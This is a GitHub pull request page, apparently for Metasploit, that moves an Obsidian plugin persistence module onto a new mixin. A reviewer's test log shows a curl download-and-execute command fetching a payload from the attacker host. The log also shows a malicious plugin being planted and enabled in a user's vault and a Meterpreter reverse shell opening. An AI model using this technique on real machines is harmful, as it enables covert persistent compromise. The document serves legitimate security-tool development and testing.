update obsidian to persistence mixin #20525
Merged
+135
−129
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msutovsky-r7
approved these changes
Sep 16, 2025
There was a problem hiding this comment.
msf exploit(multi/persistence/obsidian_plugin) > run verbose=true
[*] Command to run on remote host: curl -so ./kByxTrWAKymO http://192.168.168.128:8080/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./kByxTrWAKymO;./kByxTrWAKymO&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/obsidian_plugin) > [*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Using plugin name: R0FUt
[*] Target User: msutovsky
[*] Found user obsidian file: /home/msutovsky/.config/obsidian/obsidian.json
[+] Found open vault 17f73d27885732f9: /home/msutovsky/Desktop/testvault
[*] Uploading plugin to vault /home/msutovsky/Desktop/testvault
[*] Uploading: /home/msutovsky/Desktop/testvault/.obsidian/plugins/R0FUt/main.js
[*] Uploading: /home/msutovsky/Desktop/testvault/.obsidian/plugins/R0FUt/manifest.json
[*] Found 0 enabled community plugins ()
[+] Config file saved in: /home/ms/.msf4/loot/20250916145027_default_192.168.168.146_obsidian.communi_774598.txt
[*] adding R0FUt to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/192.168.168.146_20250916.5028/192.168.168.146_20250916.5028.rc
[*] Client 192.168.168.146 requested /Q7JGOkCYlO14PhxIQeJRIQ
[*] Sending payload to 192.168.168.146 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.146
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.146:39932) at 2025-09-16 14:50:36 +0200
msf exploit(multi/persistence/obsidian_plugin) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: msutovsky
meterpreter > sysinfo
Computer : 192.168.168.146
OS : Ubuntu 22.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Release NotesThis moves the |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Updates
obsidian_plugin_persistenceto the new persistence mixin. Part of #20374Verification
msfconsolessh_loginfor instance)use exploit/multi/persistence/obsidian_pluginset SESSION <id>exploit